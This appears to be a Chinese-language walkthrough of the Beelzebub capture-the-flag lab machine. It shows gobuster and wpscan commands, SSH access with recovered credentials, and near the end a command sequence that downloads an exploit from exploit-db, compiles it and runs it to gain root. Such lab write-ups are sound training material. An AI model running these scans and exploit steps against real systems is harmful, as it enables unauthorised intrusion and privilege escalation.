0X001 简介
我们在下载靶机时会有这样的提示:您必须尽可能多地枚举并且不要忘记 Base64。说明我们要使用base64,他主要是对Beelzebub进行base64编码,然后可以访问到新的页面,下面是我的一系列操作。
0X002 渗透过程
首先我进行IP扫码,获取靶机的ip地址
我们查看这个ip的端口开启了哪些服务
发现他是使用的apache 2.4.29进行搭建的,于是我打开这个网页
我们看一看他有没有子目录
gobuster dir -r -u http://192.168.181.169/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak
于是我在/index.php页面的源码页面给我们了一些提示
于是对其进行mds编码
echo -n beelzebub | md5sum
于是打开网页进行查看
发现他进行了页面的跳转, 那我想他会不会在这个页面下有一些子目录呢,于是进行目录扫描
gobuster dir -r -u http://192.168.181.169/d6bf00c767d95fcd6bc40fad7ead64cc --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt
什么也没有,于是我想到了wordpress CMS了解他到WP-CMS – WordPress 插件 | WordPress.org China 简体中文
进行查看,于是我使用wpscan进行查看
wpscan --url http://192.168.181.169/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force --api-token xxxxxxxxx
我发现了两个用户
还有三个子目录
在查看的工程中,发现只有/wp-content/uploads/可以访问
发现他还有一个目录可以查看/Talk To VALAK
于是发现了登录的密码
于是进行ssh登录
登录成功于是进行提权
首先我们当然是查看历史记录了
cat .bash_history
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
于是获得root权限
获得最终的flag